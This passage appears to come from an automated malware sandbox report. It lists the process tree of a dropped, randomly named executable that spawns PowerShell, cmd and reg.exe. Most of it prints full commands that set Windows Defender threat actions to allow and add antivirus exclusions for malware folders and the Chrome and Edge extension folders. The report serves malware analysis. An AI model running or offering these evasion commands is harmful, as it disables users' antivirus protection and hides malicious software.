                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4892 -ip 4892
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3116
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4892 -ip 4892
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5592
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4892 -ip 4892
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2264
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4892 -ip 4892
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3824
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4892 -ip 4892
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2840
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4892 -ip 4892
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:560
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4892 -ip 4892
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:720
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4892 -ip 4892
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1960
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4892 -ip 4892
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2008
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx\RLXyqGHcGPtHCEz\SdFyzvP.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx\RLXyqGHcGPtHCEz\SdFyzvP.exe 9M /UJHdidrzEk 757674 /S
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                        PID:3700
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147849223\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147849223\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:5352
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            PID:1996
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:972
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3980
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:5488
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5556
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4488
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:3776
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                  PID:5824
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:6020
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:2312
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5816
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:4968
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4356
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5124
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:3672
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5364
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2520
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:4496
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:1264
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2908
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2840
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2832
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5032
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5668
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:2156
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:468
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5208
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5468
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:1424
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5308
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:4044
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147849223 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:5444
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147849223 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1796
                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EQyxzaQzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EQyxzaQzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XDNVqyFHRPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XDNVqyFHRPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dHXAKiYEAiHgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dHXAKiYEAiHgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dfNSzhxDYzUU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dfNSzhxDYzUU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icUnJtTQvkuELQjDIYR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icUnJtTQvkuELQjDIYR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\EeSlYCOAJoZqeyVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\EeSlYCOAJoZqeyVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lOiFxebpMgzycibAx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\cMefWQcQhcMRZPgD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\cMefWQcQhcMRZPgD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5196
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EQyxzaQzU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:5136
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EQyxzaQzU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:4656
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EQyxzaQzU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:2204
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XDNVqyFHRPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5132
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XDNVqyFHRPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1476
                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dHXAKiYEAiHgC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:2372
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dHXAKiYEAiHgC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:4800
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dfNSzhxDYzUU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:3988
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dfNSzhxDYzUU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:5072
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
